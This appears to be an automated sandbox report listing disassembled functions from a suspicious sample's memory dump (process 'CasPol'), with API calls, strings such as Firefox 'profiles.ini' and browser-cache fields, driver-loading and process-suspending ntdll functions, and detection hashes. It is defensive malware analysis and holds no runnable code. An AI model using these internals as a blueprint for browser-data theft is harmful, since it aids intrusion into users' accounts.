                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                    Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                    • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
